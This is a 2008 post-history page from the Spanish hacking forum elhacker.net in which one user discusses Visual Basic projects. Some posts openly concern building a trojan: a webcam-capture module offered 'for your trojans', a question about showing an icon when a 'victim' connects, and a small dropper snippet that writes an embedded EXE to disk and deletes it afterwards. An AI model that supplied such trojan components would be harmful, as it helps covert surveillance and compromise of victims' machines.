elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 [8] 9 10 11 12 13
71  Programación / Programación Visual Basic / Re: Webcam Capture By C@$P€® en: 16 Octubre 2008, 23:37 pm
Si tio el problema es que crei que habia guardao el source pero en si lo que guarde fue el form al principio ok xDDD A veces pasa pero de todas formas mañana me pongo y lo vuelvo a hacer no es tan dificil!!!
72  Programación / Programación Visual Basic / Webcam Capture By C@$P€® en: 16 Octubre 2008, 23:25 pm
Hey chicos aqui les dejo otra cosilla que hice en mi tiempo libre...Se trata de un Webcam Capture para sus Troyanos...Ahora si les dejo el code aqui...xD no deje el code del otro porque lo coplile directamente y se me olvido guardarlo jeje...xD Bueno sin más aqui esta !!!!! :laugh: Cualquier duda pregunten!!!!!!

http://rapidshare.com/files/154702797/WEBCAM.rar


PD: A lo mejor mañana me animo y hago el screencapture xDDD

Código:
Private Sub Hacked_Click()
MsgBox "Me eh dado cuenta que si quieres que las cosas te funcionen tienes que hacerlas por ti mismo", vbCritical, "ELHACKER.NET"
End Sub
73  Programación / Programación Visual Basic / Re: Script Manager By C@$P€R en: 16 Octubre 2008, 18:26 pm
Las dependencias se extraen en el programa cuando lo abres y cuando se cierra se vuelven a eliminar revisal para que veas!  :laugh:
74  Programación / Programación Visual Basic / Script Manager By C@$P€R en: 16 Octubre 2008, 09:58 am
Hola chicos hoy estaba con algo de tiempo libre y me anime a hacer un Script Mnager para que puedan hacer sus script  .BAT o .VBS sin tener que utilizar Notepad y eso, bueno aqui se los dejo por si alguno lo quiere mirar...XD



Descargar Copilado http://rapidshare.com/files/154494274/Script_Manager_v1.0.exe

SOURCE: http://rapidshare.com/files/154743836/Script_Manager_By_C__P_R.rar




Ok Ya esta el source!!!!!!!!!!!!!!!!!  :laugh:  :xD  ;D
75  Programación / Programación Visual Basic / Re: Generar EXE desde .res en: 15 Octubre 2008, 23:42 pm
En vez de environ tambien puedes poner la ruta ej: "C:\elsoft.exe"
Y despues al que se autoborre con kill "C:\elsoft.exe"
76  Programación / Programación Visual Basic / Re: Generar EXE desde .res en: 15 Octubre 2008, 23:34 pm
Sharki como te dije antes lo puedes hacer de la siguiente manera!!!

Código:
Dim fireres() As Byte
fireres = LoadResData(101, "CUSTOM")
Open Environ("Homedrive") & "\elnombre.exe" For Binary As #1
Put 1, 1, fireres
Close #1
End Sub

Si esta mal me corrigen xD!!! :P
77  Programación / Programación Visual Basic / Re: FullRowSelect en: 12 Octubre 2008, 17:42 pm
Man muchas gracias me ha servido de mucho !!!!Cuidate!!!!!!!xDDDDDDDDDDDD :laugh:
78  Programación / Programación Visual Basic / FullRowSelect en: 12 Octubre 2008, 16:23 pm
Hola chicos, estaba tratando ponerle a un LV (Microsoft Windows Common Control 5.0) la opción de FullRowSelect pero veo que esta no trae esta opción y quiero ponersela a este ya que estoy usando el estilo XP y el LV del control Microsoft Windows Common Control 6.0 no acepta este estilo por lo que necesito ponerselo al listview, porfa necesito que me ayuden!! Gracias de antemano!!!!!!!!!!
79  Programación / Programación Visual Basic / Re: Agregar imagen a subitem del listview en: 8 Octubre 2008, 12:18 pm
Hey porfa que necesito hacer eso nadie sabe ?
80  Programación / Programación Visual Basic / Agregar imagen a subitem del listview en: 6 Octubre 2008, 22:04 pm
Hola amigos tengo una dudilla, es algo como para darle un poco mas de estetica al troyano pero bueno haber si me pueden ayudar, bueno lo que yo quiero hacer es que cada vez que una victima se conecte al troyano agregue una imagen en el subitem 1 del listview es este caso el del nombre...Bueno si me pueden ayudar se los agradeceria...
Páginas: 1 2 3 4 5 6 7 [8] 9 10 11 12 13
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines